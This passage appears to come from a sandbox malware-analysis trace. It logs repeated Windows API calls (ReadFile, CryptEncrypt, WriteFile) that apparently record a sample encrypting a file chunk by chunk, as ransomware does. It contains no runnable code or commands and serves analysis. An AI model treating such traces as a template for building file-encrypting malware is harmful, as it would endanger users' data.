lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.525] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.525] GetLastError () returned 0x0 [0170.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.525] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.525] GetLastError () returned 0x0 [0170.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.526] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.526] GetLastError () returned 0x0 [0170.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.526] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.526] GetLastError () returned 0x0 [0170.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.526] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.526] GetLastError () returned 0x0 [0170.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.526] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.526] GetLastError () returned 0x0 [0170.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.527] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.527] GetLastError () returned 0x0 [0170.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.527] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.527] GetLastError () returned 0x0 [0170.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.527] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.527] GetLastError () returned 0x0 [0170.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.527] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.527] GetLastError () returned 0x0 [0170.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.527] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.527] GetLastError () returned 0x0 [0170.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.528] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.528] GetLastError () returned 0x0 [0170.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.528] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.528] GetLastError () returned 0x0 [0170.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.528] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.528] GetLastError () returned 0x0 [0170.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.529] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.530] GetLastError () returned 0x0 [0170.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.530] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.530] GetLastError () returned 0x0 [0170.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.530] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.530] GetLastError () returned 0x0 [0170.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.530] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.530] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.530] GetLastError () returned 0x0 [0170.530] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.531] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.531] GetLastError () returned 0x0 [0170.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.531] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.531] GetLastError () returned 0x0 [0170.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.531] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.531] GetLastError () returned 0x0 [0170.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.531] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.531] GetLastError () returned 0x0 [0170.531] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.531] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.532] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.532] GetLastError () returned 0x0 [0170.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.532] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.532] GetLastError () returned 0x0 [0170.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.532] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.532] GetLastError () returned 0x0 [0170.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.532] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.532] GetLastError () returned 0x0 [0170.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.532] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.532] GetLastError () returned 0x0 [0170.532] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.532] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.533] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.533] GetLastError () returned 0x0 [0170.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.533] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.533] GetLastError () returned 0x0 [0170.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.533] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.533] GetLastError () returned 0x0 [0170.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.533] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.533] GetLastError () returned 0x0 [0170.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.533] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.533] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.533] GetLastError () returned 0x0 [0170.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, 